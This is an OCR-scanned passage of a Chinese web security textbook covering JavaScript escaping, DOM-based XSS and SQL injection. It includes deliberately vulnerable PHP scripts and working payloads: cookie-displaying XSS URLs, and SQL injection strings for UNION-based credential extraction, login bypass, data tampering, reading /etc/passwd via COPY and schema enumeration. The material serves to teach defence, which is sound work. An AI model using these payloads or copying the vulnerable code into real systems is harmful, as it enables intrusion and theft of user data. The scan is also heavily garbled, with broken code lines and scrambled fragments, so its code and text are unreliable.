// 将 字符 串 全 部 转换 为 \uXXXX 形式 
function unicode _ escape ($matches) { 
$u16 = mb convert encoding ($matches[0], 'UTF-16'); 
return preg replace('/[0-9a-f]{4}/' ,， '\u$0', bin2hex($u16)); 














} 
// 将 除了 字母 、 数 字 、 喜 号 和 点 号 外 的 字符 转 义 为 \uXXXX 形式 


function escape js string($s) { 




















return preg replace callback('/[^-\.0-9a-zA-Z2]+/u', 'unicode escape', $s); 


} 


党 条 





调用 例 





<script> 
alert ('<?php echo escape js string(' 吉 and 吉 '); ?>'); 


</ BSCEipEtS 





生成 的 脚本 





<script> 
alert ('\ud842\udfb7and\u5409')，; 
</SCELODES 











脚本 解说 
unicode_escape 函数 的 功能 为 将 输入 字符 串 全 部 以 \uXXXX 的 UNICODE 形式 进行 转 义 
在 mbp_convert_encoding 中 将 输入 字符 串 的 字符 编码 转换 为 UTF-16 
在 bin2hex 中 将 对 象 字符 冲 转 换 为 十 六 进 制 
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使 用 正则 表达 式 ， 每 4 个 字 节 搬入 一 个 ua 

escape_js_string 函数 的 功能 为 将 字母 与 数字 以 外 的 字符 转 义 为 XXXX 的 形式 

在 preg _ replace callback 也 数 中 ,将 字母 和 数字 以 外 的 字符 串 全 部 传 给 unicode _ escape 
函数 处 理 











OO JavaScript 中 引用 定义 在 script 元 素 外 的 参数 的 方法 

为 了 避免 动态 生成 JavaScript， 在 script 元 素 外 部 定义 参数 后 再 在 JavaScript 中 引用 该 参数 也 
是 一 个 解决 方案 。 不 过 ， 该 方案 的 实施 需要 利用 hidden 参数 。 

下 面 展示 了 利用 hidden 参数 的 示例 脚本 。 前 提 条 件 是 内 部 字符 编码 为 UTF-8。 

















<input type="hidden" id="familyname" value="<?php 
echo htmlspecialchars(Sftamilyname, ENT COMPAT, "UTEF 8"'); ?>"> 


<script type="text/javascript"> 
Var familyname = document .getElementById('familyname') .value; 


Ls 

















开头 的 input 元 素 指定 了 id="familyname" 以 使 其 能 被 引用 。 此 外 ， 根 据 属 性 值 的 转 义 规 
则 ， 第 2 行 在 设 值 时 使 用 了 htmlspecialchars 进行 转 义 并 将 其 用 双 引 号 括 了 起 来 。 

而 input 的 值 则 在 倒数 第 2 行 被 getElementById 方法 引用 。 

此 方案 的 优点 为 ， 由 于 避 开 了 JavaScript 特有 的 繁琐 问题 ， 只 需 遵 守 少 量规 则 就 能 防范 
XSS， 因 此 思路 比较 简单 。 而 缺点 就 是 定义 JavaScript 代码 与 参数 的 地 方 相 隔 较 远 ， 可 能 会 使 脚 
本 的 可 读 性 降低 。 

读者 在 实际 操作 时 ， 可 以 在 综合 考虑 两 种 方案 的 特性 后 ， 根 据 实际 情况 做 出 抉择 。 

















DOM based XSS 

除了 上 述 的 各 种 XSS 之 外 ， 还 有 一 种 叫 作 “DOM based XSS” 的 义 SS。JavaScript 常用 于 客 
户 端的 显示 处 理 ，DOM based XSS 即 潜藏 于 此 处 的 安全 隐患 。 

下 面 是 含有 DOM based XSS 漏洞 的 简单 的 HTML。 





代码 清单 ”/43/43-011.html 





<body> 
你 好 
<script type="text/javascript"> 
document .URL .match (/name= ( [^&] x*) /) ;一 一 取出 查询 字符 品 中 name 的 值 
document .write (unescape (RegExp .$1) ) ; — 将 取出 的 值 显示 在 页 面 上 
</script> 
</body> 


UU 
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这 段 HTML 的 目的 是 将 查询 字符 串 中 name= 指定 的 姓名 通过 JavaScript 显示 在 页 面 上 。 例 
如 ， 使 用 http:/example.jp/43-011.html?name=YamadaURL 显示 页 面 时 ， 页 面 上 就 会 显示 “你 好 ， 
Yamada”。 

按照 惯例 ， 下 面 我 们 来 看 一 下 对 这 段 HTML 进行 攻击 的 示例 。 使 用 如 下 URL 打开 网 页 时 ， 
页 面 显示 如 图 4-27 所 示 。 














http://example.jp/43/43-011.html?name=<script>alert (document .cookie) 
/SCELSES 











4-27 DOM based XSS 的 结果 


二 
靖 htp//examplejp/43/43-011htmliname=<script>alert(document.cookie)</scrip.. LEE 
GO [a ntpyeuomplejp/43/43.01Lhmizname=<seril » [5 |X ||® sing pr 


窜 届 i | htpy/examplejp143/43-01Lhtmlzname=<sc- IO ~ 























他 [RAR Lz | 





外 PHPSESSID=r882i61dpigSh0g9lghc282kd0 


























攻击 者 注入 的 JavaScript 代码 不 会 出 现 于 服务 顺 端 生成 的 HTML 中 ， 因 此 这 类 XSS 被 称 为 
“DOM based XSS”。 现 今 使 用 JavaScript 来 显示 页 面 的 案例 越 来 越 多 ， 而 即便 是 部 分 显示 使 用 
JavaScript 也 必须 要 考虑 其 中 是 否 会 有 HTML 标签 。 

JavaScript 的 标准 函数 中 没有 提供 转 义 HTML 的 功能 ， 因 此 这 里 我 们 使 用 jQuery 这 个 风靡 全 
球 的 JavaScript 库 来 示范 字符 串 的 显示 。 使 用 span 元 素 确定 字符 串 的 显示 位 置 ， 然 后 向 id 指定 
的 DOM 中 插入 文本 文字 。 这 时 可 以 使 用 text 方法 自动 进行 转 义 操作 。 


代码 清单 ”/43/43-011a.html 




















<body> 
<script src="jquery-1.4.4.min.js"></script>* 一 一 加 载 jQuery 
你 好 <span id="name"></span> 
<script type="text/javascript"> 
if (document .URL.match(/name\=([^&]*)/)) { 
Var name = unescape (RegExp.$1); 
$('#name') .text (name) ; 。 蝇 示 5 林 
} 
ee 
</body> 














实施 防范 策略 后 的 脚本 运行 结果 如 下 图 ， 能 看 到 < 等 被 转 义 后 正确 地 显示 了 出 来 。 
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a 二 = 

图 4-28 实施 防范 策略 后 脚本 的 显示 结果 
pnp 0 pn [eladil 

© [8 htp//eamplejp/s3/43-011ahimlnam se |?| xj] 加 Bing DE 
席 收藏 夫 | 息 htpy/exa :xamplejp/43/43-011a.html2name=<s... 工具 (O) ~ 

















你 好 <script>alert(document cookie)</script> 

















允许 HTML 标签 或 CSS 时 的 对 策 

开发 博客 系统 或 SNS 网 站 时 ， 有 时 需要 允许 用 户 使 用 HTML 标签 或 自 定义 CSS ( Cascading 
Style Sheet )。 但 是 ， 这 样 会 带 来 很 大 的 XSS 风险 。 

一 旦 允许 输入 HTML 标签 ， 用 户 就 能 够 使 用 script 元 素 或 事件 绑 定 函数 等 执行 JavaScript， 
同样 ,在 CSS 中 使 用 expression 功能 ?了 也 能 执行 JavaScript， 而 问题 是 这 些 JavaScript 有 可 能 并 不 
是 开发 者 所 设置 的 。 

为 了 避免 此 类 JavaScript 的 执行 ， 可 以 采取 解析 用 户 输入 的 HTML， 仅 允许 可 以 显示 的 元 素 
的 方法 。 但 是 HTML 的 语法 结构 相当 复杂 ， 此 方法 实施 起 来 实 属 不 易 。 

所 以 ， 开 发 允许 用 户 输 入 HTML 标签 或 CSS 的 网 站 时 ， 最 好 的 方法 可 能 就 是 使 用 能 够 
解析 HTML 文本 语法 结构 的 第 三 方程 序 库 。PHP 中 能 利用 的 程序 库 有 HTML Purifier ( http:// 
htmlpurifier.org/ ) 等 。 


























参考 : Per| 中 转 义 Unicode 的 函数 
以 下 为 Perl 中 转 义 Unicode 的 函数 范例 。 





#!/usr/bin/perl 

use strict,; 

use utf8; 

use Encode qwl(decode encode); 

# ... 

# 将 输入 值 全 部 转 义 为 \uXXXX 形式 

sub unicode escape { 
my $u16 = encode('UTF-16BE',，,$ [0]); # 转换 为 UTF-16 
my S$hex = unpack('H*', $u16); # 转换 为 十 六 进 制 字符 串 

# 每 隔 4 个 字符 插入 一 个 \u 

Shex =~ s/([0-9a-f]{4})/\\u\1/g; 

return Shex; 


} 









































中 这 是 微软 的 Internet Explorer 中 提供 的 扩充 功能 。IE8 的 标准 模式 中 禁用 了 此 功能 ， 但 在 其 他 模式 中 还 可 以 使 用 。 
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# 将 字母 和 数字 以 外 的 字符 转 义 为 \uXXXX 形式 


sub escape js string { 



































my ($s) = @ ; 
# 将 字母 、 数 字 、 减 号 、 点 号 以 外 的 字符 串 传 给 unicode 函数 处 理 
$s =~ S/([^-\.0-9a-zRA-2]+)/unicode escape($1)/eg; 


return $s; 


} 











A 错误 消 息 导致 的 信息 泄漏 
错误 消息 导致 的 信息 泄漏 有 以 下 两 种 情况 。 


错误 消息 中 含有 对 攻击 者 有 帮助 的 应 用 程序 内 部 信息 
通过 蓄意 攻击 使 错误 信息 中 显示 隐私 信息 (如 用 户 个 人 信息 等 ) 


应 用 程序 内 部 信息 是 指 ， 发 生 错 误 的 函数 名 、 数 据 库 的 表 名 、 列 名 等 ， 这 些 信息 都 有 可 能 成 
为 攻击 的 突破 口 。 而 第 二 种 情况 的 具体 内 容 会 在 4.4.1 节 中 结合 示例 讲解 。 

为 了 解决 以 上 问题 ， 当 应 用 程序 发 生 错误 时 ， 应 该 仅 在 页 面 上 显示 “此 时 访问 量 太 大 ， 请 稍 
后 再 试 ”等 提示 用 户 的 消息 ， 而 错误 的 详细 内 容 则 以 错误 日 志 ( Error Log ) 的 形式 输出 。 详 情 可 
参考 5.4 节 。 

PHP 的 情况 下 ， 禁 止 显 示 详 细 错 误 信 息 ， 只 需 在 php.ini 中 做 如 下 设置 。 
























































display errors = Off 











总 结 

4.3 节 集 中 讲述 了 XSS 漏洞 。 由 于 XSS 漏洞 产生 的 主要 原因 为 显示 的 方法 存在 问题 ， 所 以 消 
除 XSS 漏洞 的 第 一 步 就 是 生成 正确 的 HTML。 开 发 新 项 目 时 ， 只 要 能 够 保持 警惕 ， 避 免 XSS 漏 
洞 并 不 困难 ， 但 事后 再 来 应 对 XSS 漏洞 的 话 却 相当 费心 费力 ， 而 且 有 时 即使 发 现 了 隐患 也 会 姑 
且 将 其 搁置 。 但 这 样 做 是 非常 危险 的 ， 因 此 ,不 论 网 站 的 特点 如 何 ， 笔 者 都 强烈 建议 从 最 开始 就 
局 写 正 确 的 代码 来 杜绝 XSS 漏洞 。 


继续 深入 学 习 
读者 们 在 学 习 完 本 书 的 内 容 后 ， 如 果 还 想 继续 深入 学 习 的 话 ， 可 以 参考 以 下 信息 。 
































TS 




















长 谷川 阳 介 的 连载 
NetAgent 公司 的 长 谷川 阳 介 在 “@IT” 上 连载 了 《教科 书 上 学 不 到 Web 应 用 安全 知识 》 系 
列 文章 ， 围 绕 着 浏览 器 关于 XSS 的 特有 问题 等 进行 了 浅显 易 懂 的 讲解 。 


(ES 
oy http://www.atmarkit.co.jp/fcoding/index/webapp.html 








4.4 SQL 调用 相关 的 安全 隐患 


大 多 数 Web SQL 来 访问 关系 型 数据 库 。 但 如 果 程 序 


库 的 实现 代码 不 


4.4.1 


SQL 注入 


概要 


SQL 注入 漏洞 是 由 于 SQL 语句 的 调用 方法 不 完善 而 产生 的 安全 隐患 。 一 旦 应 用 中 存在 SQL 
注入 漏洞 ， 就 可 


主动 攻击 ， 而 不 需要 上 


数据 库 内 的 信息 全 部 被 外 界 窍 取 





让 





能 会 造成 如 下 景 
日 户 的 参与 。 
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数据 库 中 的 内 容 被 算 改 
登录 认证 被 绕 过 (应 用 程序 登录 不 需要 用 户 名 和 密码 ) 
其 他 ， 例 如 服务 器 上 的 文件 被 读 取 或 修改 、 服 务 顺 上 的 程序 被 执行 等 


可 见 SQL 注入 漏洞 的 破坏 力 极 大 ， 因 此 ， 作 为 程序 
静态 占 位 符 调用 SQL 语句 就 是 一 种 有 效 的 对 策 。 详 情 请 参考 本 节 的 


SQL 注入 漏洞 。 其 中 ， 使 用 


“对 策 ”。 


SQL 注入 漏洞 总 览 


让 


调用 SQL 语句 的 地 方 


-一 名; 


ea 


生地 点 


影响 范围 
页 面 














影响 类 型 


2 信息 泄露 、 自 改 数 和 


Ee 程度 


用 户 参 与 程度 


不 


对 


策 概 要 














四 、 绕 








NE 





使 用 静态 占 位 符 调用 SQL 语句 








区 响 。 值 得 注意 的 是 ， 以 下 景 


I 





靖 


自 运 行程 序 、 





浏 ， 人 网 





开发 人 员 ， 


或 编辑 文件 














中 使 用 SQL 语句 访问 数据 


就 会 产生 SQL 注入 漏洞 。 接 下 来 ， 本 节 就 将 对 SQL 注入 漏洞 做 一 介绍 。 


乡 响 中 攻击 者 都 能 够 直接 对 服务 器 实施 





在 编程 时 务必 要 确保 不 引入 
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攻击 手段 与 影响 
接 下 来 ， 笔 者 将 使 用 示例 脚本 来 讲解 SQL 注入 攻击 的 方法 与 影响 。 
人 示例 脚本 解说 
以 下 PHP 脚本 的 作用 为 检索 数据 库 ( PostgreSQL ) 内 的 图 书库 存 ， 该 脚本 含有 SQL 注入 
漏洞 。 


代码 清单 ”/44/44-001.php 











<?php 
header ('Content-Type: text/html; charset=UTF-8'); 
$author = $ GET['author']; 
$con = pg _ connect ("host=localhost dbname=wasbook user=postgres password=wasbook"); 
$ssqlstm = "SELECT id, title, author, publisher, date, price FROM books WHERE 
author ='$author' ORDER BY id"; 
$rs =: pg query ($con, $sqlstm); 


人 





<body> 

<tabLle. DOLAeY=L 

ES 

<th> 图 书 ID</th><th> 书 名 </th><th> 作者 名 </th><th> 出 版 社 </th> 
<th> 出 版 年 份 </th><th> 价格 </th> 
































</tr> 
<?php 
$maxrows = pg _ num rows ($rs); 
for ($i = 0; $i < $maxrows; S$i++) { 


$row = pg _ fetch row($rs, $i); 
echo "<tr>\n"; 
for ($j := 07 $j < 67 SJE#) { 
Echo vetds™ . $row[l$j] . ™</tads\n"; 
} 
echo "</tr>\n"; 
} 
pg_close ($con); 
2 
</table> 
</body> 











首先 来 看 一 下 正常 情况 下 脚本 的 运行 情况 ， 比 如 ， 使 用 如 下 URL 来 检索 作者 为 Shakespeare 


的 图 书 。 


zh 








http://example.jp/44/44-001.php?author=Shakespeare 
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图 4-29 正常 调用 示例 





























r 中 
条 httpy/examplejp/44/44-001.php?author=Shakespeare - Windows Internet Explorer lB| 器 
全 |@ htp//examplejp/44/44-001.php?author=Shakespeare -|3|x] 回 soo Pp- 

帘 收 天 | 看 htpy/examplejp/44/44-001.php?author=Sh.. | | IRAO)™ 











书籍 IDp| 书 名 作者 名 出 版 社 “出 版 年 月 价格 
1001 ”| 仲夏 夜 之 梦 |Shakespeare 青森 书籍 ”|1979/01 |600 

1002 ”| 哈姆雷特 “|Shakespeare | 岩手 书房 “|1997/04 |1260 
1003 ” 庚 克 和 白 。 |Shakespeare| 山 形 出 版 [2001/05 |1530 
1004 ” 订 尔 王 Shakespeare 秋田 公论 社 [2004/07 ”|1890 






































[= J 


接 下 来 就 让 我 们 来 看 一 下 针对 此 脚本 的 攻击 方法 。 


令 错 误 消 息 导致 的 信息 泄漏 
以 下 URL 的 目的 在 于 攻击 44-001.php 以 导致 信息 泄露 。 使 用 该 URL 打开 页 面 ， 显示 结果 如 
图 4-30 所 示 。 














http://example.jp/44-001.php?author='+and+cast ((select+id||':'||pwd+from+users+offs 
et+0+limit+1)+as+integer) >1-- 











图 4-30 ”错误 消息 导致 的 信息 泄漏 


[htp//examplejp/44/44-001.php?outhor= +and+ cast((selecttidll lipwd*fro.. [ || | 











OO Bp//exemplejp/44/a4-00Lphp?author=" [+|x)ang P| 


窜 收 天 | 态 htp//examplejp/44/44-001.php?author="+.。 | | IRA(O) ~ 

















Warning: pg_query() [function pg_query] Query failed ERROR- invalid input syntax for 


integer [yamadapassl|in lvar/www/44/44-001.php on line 7 

















错误 消息 中 显示 了 用 户 名 和 密码 为 yamada:pass1。 这 就 是 利用 SQL 注入 攻击 致使 信息 泄 
的 手段 。 
此 攻击 的 核心 部 分 为 下 面 的 子 查询 语句 。 





(select id||':'||pwd from users offset 0 limit 1) 











该 子 查询 查找 users 表 中 第 一 条 数据 的 id 和 pwd (用 户 名 和 密码 ) 字段 后 ， 返 回 将 两 者 以 冒 
相连 后 的 字符 串 ， 即 上 图 中 的 yamada:pass1。 然 后 ， 语 句 中 尝试 将 字符 串 yamada:passl 通过 cast 
函数 转换 为 integer 类 型 ， 但 由 于 转换 类 型 时 出 错 ， RSS 岂 。 

此 处 并 不 需要 透彻 理解 这 条 SQL 语句 ， 但 一 定 要 知道 通过 SQL 注入 攻击 能 够 取得 数据 库 中 
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的 任意 信息 。 即 使 SQL 注入 漏洞 存在 于 一 些 不 起 眼 的 地 方 ， 也 可 能 会 直接 导致 网 站 的 重要 信息 
另外 ， 上 述 SQL 注入 攻击 也 是 恶意 利用 错误 消息 的 典型 案例 。 因 此 ， 开 发 时 应 该 注意 不 要 
将 程序 内 部 的 错误 内 容 显示 在 错误 消息 中 。 








令 UNION SELECT 致使 的 信息 泄漏 

SQL 注入 引发 的 信息 泄漏 中 ， 除 了 利用 错误 消息 的 方法 外 ， 还 有 一 种 手段 是 使 用 UNION 
SELECT。UNION SELECT 的 作用 为 将 两 个 SQL 语句 的 检索 结果 求 和 。 

下 面 我 们 来 看 一 个 利用 UNION SELECT 致使 信息 浊 漏 的 例子 。 执 行 以 下 URL 后 ， 页 面 显 
示 结 果 如 图 4-31 所 示 。 从 图 中 可 以 看 出 ， 本 应 显示 图 书信 息 的 页 面 上 显示 了 用 户 的 个 人 信息 。 








http://example.jp/44/44-001.php?author='+union+select+id,pwd,name,addr,null,null,nu 


ll+fromtusers-- 











4-31 使 用 UNION SELECT 进行 攻击 的 结果 


1 
税 http://examplejp/44/44-001.php?author="+union+select+id,pwd,name,addr,.. [eI®l ¥ 
人 SR [ertp//examplejp/s4/44-00Lphp?author="+ *[ 宁 | Xx | 2ing pr- 


痪 W 项 夫 | 悦 htpy/examplejp/44/44-001.php?author=+… | ; IRO -~ 


市 籍 D| 书 名 [作者 名 出 版 社 ”| 出 版 年 月 [价格 
[yamada lpass1 ”| 山田 太一 神奈川 县 川崎 市 
tanaka passl ”| 山石 京子 | 东京 都 港 区 三 田 
|sato ”|password | 佐藤 一 志 | 神奈川 县 横滨 市 


















































此 处 不 对 攻击 的 详情 进行 说 明 ， 读 者 只 需 记 住 一 旦 使 用 UNION SELECT 的 攻击 得 进 ， 仅 此 
一 次 攻击 就 能 使 大 量 信息 泄漏 。 


多 使 用 SQL 注入 绕 过 认证 

当 登 录 页 面 存 在 SQL 注入 漏洞 时 ， 认 证 处 理 就 能 被 绕 过 ， 从 而 导致 在 不 知道 密码 的 情况 下 
也 能 成 功 登录 应 用 。 

以 下 就 是 一 个 含有 SQL 注入 漏洞 的 登录 页 面 。 首 先是 用 户 名 和 密码 的 输入 页 面 ， 为 了 方便 
演示 ， 此 处 密码 输入 框 的 type 属性 使 用 了 text。 





代码 清单 ”/44/44-002.html 





<html> 

<head><title> 请 登录 </title></head> 
<body> 

<form action="44-003.php" method="POST"> 
名 <input type="text" name="id"><br> 























密码 <input type="text" name="pwd"><br> 





<input type="submit" value=" 登录 "> 





</form> 
</body> 
</html> 
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下 面 是 接收 用 户 名 和 密码 后 进行 登录 处 理 的 脚本 。 


代码 清单 ”/44/44-003.php 





<?php 
session start(); 
header ('Content-Type: text/html 
$id = @$ PosT['id']; // 名 
$Spwd = @$_POST['pwd']; // 密码 
// 连接 数据 库 
$con 
// 拼接 SQL 语句 
$sql = "SELECT * FROM users WHE 






































echo ' 登录 成 功 '; 
} else { 
echo ' 登录 失败 ' ; 
} 
pg_close($con) ; 
2 
</body> 
</html> 





pg_connect ("host=localhost dbname=wasbook user=postgres password=wasbook"); 


Srs = pg_query ($con，S$sql); // 执行 查询 
?> 
<html> 
<body> 
<?php 
if (pg num rows($rs) > 0) { // 如 果 存 在 SELECT 结果 则 登录 成 功 
$_SESSION['id'] = $id; 


charset=UTF-8'); 


了 


RE id ='$id' and pwd = '$pwd'"; 

















正常 情况 下 ， 登 录 页 面 中 输入 用 户 























图 4-32 认证 成 功 例 
三 注 -Wndows nemat Bplorer SI 肌 
OO [htp//examplejp/s4/44-002html | 31x ||S eng DE 
容 收 Bs 夫 | 看 请 妈 [| TNO” 
用 户 名 yamada _ 
密码 pass | 














J 





名 yamada 和 密码 passl 后 就 能 认证 成 功 。 




















| 独 httpy/examplejp/44/44-003.php - Windows Internet Explorer 呈 | 回 | 器 
OO [htp//examplejp/sa/44-003.php ~[31x||S eng Pp 
窗 收 夫 | 外 http//examplejp/44/44-003.php LL | TAO 








登录 成 功 














| 





| 





下 面 我 们 来 看 一 下 对 此 登录 页 面 
下 密码 。 


进 


行 攻击 的 例子 。 假 设 攻击 者 在 不 知道 密码 的 情况 下 输入 以 





' or da"s'"a 
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.bh ~ 
这 时 登录 竟然 也 成 功 了 。 
4-33 ”认证 被 绕 过 
[生肖 录 -windows Interet Explorer I 国 | 器 仿 http://examplejp/44/44-003.php - Windows Internet Explorer [ele ¥ 
DO |] httpi//examplejp/44/44-002.html | 宁 | xX | sing pr OO » | 回 htpy/examplejp/44/44-003.php ~ | 宁 | xX | sing P 
六 收 B | 外 遍 隶 Eee | 工具 Oo) ~ 遍 大夫“| 锐 htpy/examplejp/at4-ooaphp | 工具 Oo) ~ 























用 户 名 yamada 一 
密码 “or'a=3 
E | 让 | 




















此 时 ， 拼 接 后 的 SQL 语句 如 下 。 阴 影 部 分 为 密码 输入 框 内 输入 的 字符 串 。 








SELECT * FROM users WHERE id ='yamada' and pwd = '' OR 'a'='a! 








SQL 语句 的 末尾 被 添加 了 oR 'a' = 'a'， 因 此 WHERE 语句 始终 保持 成 立 状态 。 
由 此 可 知 ， 如 果 登 录 页 面 存在 SQL 注入 漏洞 ， 就 可 能 使 密码 输入 框 形同虚设 。 

令 通 过 SQL 注入 攻击 算 改 数据 
接 下 来 向 大 家 介绍 一 下 使 用 SQL 注入 攻击 算 改 页 面 数 据 的 例子 。 首 先 用 以 下 URL 打开 页 面 。 





http://example.jp/44/44-001.php?author=';updatetbooks+set+title%3D'<i>cracked!</ 
i>'+where+id%3d'1001'-- 

















然后 再 次 检索 Shakespeare， 页 面 显示 就 如 下 图 所 示 。“ 仲 夏 夜 之 梦 ” 变 成 了 “cracked ! ”， 字 
体 也 变 成 了 斜体 。 


4-34” 算 改 数 据 的 例子 


二 
税 http://examplejp/44/44-001.php?author=Shakespeare - Windows Internet Explor..| 叫 /回避 


OO- | 加 httpi//examplejp/44/44-001.php?author=Shaks » | 宁 | X |] 加 spo 写本 























次 W 若 赤 | 磋 htpy/examplejp/44/44-001.php?author=Sh.. | IRA(O) ~ 





书籍 ID| 书 名 | 作者 名 | 出 版 社 出 版 年 月 价格 
|1001 ”|cracked! [Shakespeare 青森 书籍 ”|197901 |600 

|1002 ”哈姆雷特 |Shakespeare | 岩手 书房 ”1997/04 “|1260 
|1003 ” 庚 克 和 白 ”|Shakespeare | 山形 出 版 ”|2001/05 ”|1530 
|1004 ” 座 尔 王 ”|Shakespeare 秋田 公论 社 |2004/07 ”|1890 





























第 一 次 打开 页 面 时 执行 的 SQL 文 如 下 。 阴 影 部 分 为 外 界 传人 的 字符 串 ， 此 处 为 了 方便 阅读 
加 入 了 换行 。-- 后 面 的 字符 被 当成 SQL 文 的 注释 而 被 忽略 。 





SELECT * FROM books WHERE author =' 





update books set title='<i>cracked!</i>' where id='1001'--'ORDER BY id 











同时 我 们 看 到 HTML 的 i 元 素 也 生效 了 ， 由 此 可 以 得 知 插入 的 HTML 标签 是 有 效 的 。 而 在 
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实际 的 攻击 中 ， 攻 击 者 使 用 iframe 或 script 元 素 等 发 动 攻击 ， 使 用 户 的 计算 机 感染 病毒 的 案例 可 
以 说 是 层出不穷 。 

另外 ， 如 果 要 在 虚拟 机 中 恢复 被 贷 改 的 数据 库 ， 可 以 执行 以 下 脚本 ， 或 者 在 http://example. 
jp/44 的 菜单 中 点 击 “12. resetdb : 恢复 数据 库 ” 链 接 。 


























http://example.jp/44/resetdb.php 














令 其 他 攻击 
根据 数据 库 引 擎 的 不 同 ， 通 过 SQL 注入 攻击 还 可 能 会 达到 下 列 效果 。 
执行 OS 命令 
读 取 文 件 
编辑 文件 


通过 HTTP 请 求 攻 击 其 他 服务 器 


此 处 举 一 个 读 取 文 件 的 例子 。 同 样 使 用 44-001.php 作为 范例 。 
首先 使 用 如 下 URL 打开 页 面 。 





http://example.jp/44/44-001.php?author=';copyt+books (title)+from+'/etc/passwd'-- 





此 时 会 调用 如 下 SQL 语句 。 





copy books (title) from '/etc/passwd' 











这 里 的 COPY 语句 是 PostgreSQL 数据 库 的 扩展 功能 ， 能 够 将 文件 内 容 存 人 表 中 。 此 例 
中 /etc/passwd 就 被 存 人 了 books 表 的 title 列 。 执 行 COPY 语句 需要 PostgreSQL 的 管理 员 权限 以 
连接 数据 库 。 

为 了 确认 效果 ， 接 下 来 我 们 用 如 下 URL 打开 页 面 。 














http://example.jp/44/44-001.php?author='ortauthor+is+null-- 











受 SQL 注入 攻击 的 影响 ， 页 面 显示 author 列 的 值 为 NULL 的 行 。 结 果 如 下 图 所 示 。 





108 | 


图 4- 
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35 /etc/passwd 被 存 入 数据 库 





帮 http://examplejp/44/44-001.php?author="or+author+id+null-- - Windows Interne.. 


SO- 





| 加 httpy//examplejp/44/44-001.php?author='ortau ™| 好 |X || 回 | 








帘 收 太夫 | 息 htp://examplejp/44/44-001.php?author='or.. | 











书籍 DD 





书 名 





rootx-0:0root/root/bin/bash 





daemonx-1:1:daemon/usr/sbin/bin/sh 





lbinx-2-2:bin/bin/bin/sh 





sysx-3:3:sys/dev/bin/sh 








syncx-4-65534:sync/bin/bin/'sync 
[ 














/etc/passwd 的 内 容 被 保存 至 数据 库 。 


由 此 可 见 ， 在 某 些 情况 下 ，SQL 注入 攻击 可 能 会 导致 服务 器 上 的 文件 内 容 经 由 数据 库 泄漏 


至 外 界 。 


SQL 注入 攻击 造成 的 影响 因数 据 库 引擎 的 不 同 而 各 异 。 但 不 管 是 什么 样 的 数据 库 引 擎 ，SQL 
注入 都 会 导致 数据 库 内 的 数据 被 外 界 读 取 。 关 于 各 数据 库 引 擎 的 





《 Web 应 用 程序 安全 》[2]。 


综 上 所 述 ，SQL 注入 攻击 能 导致 数据 库 内 的 任意 数据 被 泄漏 或 自 改 ， 因 此，SQL 注入 漏洞 


可 谓 贻 害 无 穷 。 


专栏 : 


般 攻 


http://example.jp/44/44-001.php?author='+union+tselect+table name,column 
name,data type,null,null,null,null+from+information schema.columns+order+by+1-- 


数据 库 中 表 名 与 列 名 的 调查 方法 


























谎 


















































4-36 使 用 SQL 注入 攻击 显示 表 定 义 
f 是 http://example.jp/44/44-001.php?author="+union+select+table_name,column_name,data_type,nu... [el 时 站 





响 ， 可 以 参考 金 床 所 著 的 








COLUMN 


通过 SOL 语句 能 够 调查 数据 库 内 存在 哪些 表 和 列 。SQOL 标准 规格 中 规定 了 名 为 INFORMATION_ 
SCHEMA 的 数据 库 , 使 用 其 中 的 tables 和 columns 等 视图 ( 假 ; 
到 4-36 展示 了 通过 SQL 注入 攻击 来 使 用 columns 视 医 
击 者 都 会 使 用 这 种 方法 来 探索 数据 库 。 图 中 的 页 面 上 显示 了 表 名 、 列 名 和 类 型 名 。 








 ), 就 可 以 从 中 读 取 表 和 列 的 定义 。 
义 信 息 的 范例 。 一 









































GO 加 | 司 http://example.jp/44/44-001.php?author='+union+select+table_name,column_name,data t ~ | De | x 








帘 宙 














users 


| 入 http://examplejp/44/44-001.php?author='., | | 
mail [character varying 
addr character varying 
ld [character varying 
tel [character varying 
name |character varying 











pwd 1 character varying 
> = [ew " 
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安全 隐患 的 产生 原因 

SQL 注入 攻击 能 够 以 开发 者 意 想不到 的 方式 改变 SQL 语句 的 构造 ， 其 中 很 大 程度 上 都 是 
因为 字面 量 ” 的 缘故 。 字 面 量 指 的 是 SQL 语句 中 的 固定 值 ， 比 如 字符 串 'Shakespeare' 和 数 
值 -5 都 是 字面 量 。SQL 中 每 种 数据 类 型 都 有 相应 的 字面 量 ， 其 中 最 常用 的 是 字符 串 字 面 量 和 数 
值 字面 量 3。 


























人 字符 串 字 面 量 的 问题 

SQL 标准 规格 中 规定 字符 串 字面 量 必须 用 单 引号 括 起 来 。 而 知 要 在 字符 串 字 面 量 内 使 用 单 
引号 ， 就 需要 使 用 连续 两 个 单 引 号 来 表示 。 这 被 称 为 单 引 号 转 义 。 因 此 , 将 “0O’ Reilly” 用 于 
SQL 的 字符 串 字 面 量 时 就 需 写 成 0''Reilly。 

然而 ,在 有 SQL 注入 汤 洞 的 程序 中 ， 由 于 没有 转 义 单 引 号 ， 所 以 就 导致 拼接 后 的 SQL 语句 
如 下 。 


























SELECT * FROM books WHERE author='O'Reilly' 





将 此 SQL 语句 的 后 半 部 分 放大 ， 如 下 图 所 示 。 
图 4-37 上述 SQL 语句 的 后 半 部 分 





author='O'Reilly' 

















字符 串 字 面 被 排除 出 字符 串 字 面 量 的 部 分 


“o'Reilly” 中 的 单 引号 ? 使 得 字符 串 字面 量 结束 , 后 面 的 “Reilly'” 被 排除 出 了 字符 串 
字面 量 。 这 部 分 在 SQL 语句 中 没有 意义 ， 所 以 就 会 产生 语法 错误 。 

但 是 ， 如 果 将 “Reilly'” 换 成 有 意义 的 SQL 语句 会 如 何 呢 ? 其 实 这 正 是 SQL 注入 攻击 的 
方法 。SQL 注入 攻击 中 ， 被 插入 的 单 引号 等 排除 出 的 字符 串 是 有 意义 的 SQL 语句 ， 因 此 就 能 够 
被 应 用 程序 调用 而 执行 特定 操作 。 

为 了 便于 理解 ， 我 们 将 SQL 注入 攻击 的 字符 串 比喻 为 党 中 的 狮子 ， 如 下 图 所 示 。 无 论 攻 击 
字符 串 多 么 危险 ， 只 要 它 被 解释 为 字面 量 就 安然 无 事 。 而 如 果 狮 子 ( 攻击 字符 串 ) 被 放出 了 笼子 
(字面 量 )， 它 就 会 执行 攻击 。 




































































@ 字面 量 以 外 的 其 他 原因 造成 的 SQL 注入 攻击 ， 请 参考 “各 种 列 的 排序 ”小 节 。 
@ 除 此 以 外 还 有 布尔 型 字面 量 和 日 期 时 间 字 面 量 等 。 
@ ”严格 来 说 是 英文 中 的 搬 号 ， 但 通常 情况 下 和 单 引 号 通用 。 
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4-38 SQL 注入 攻击 字符 串 


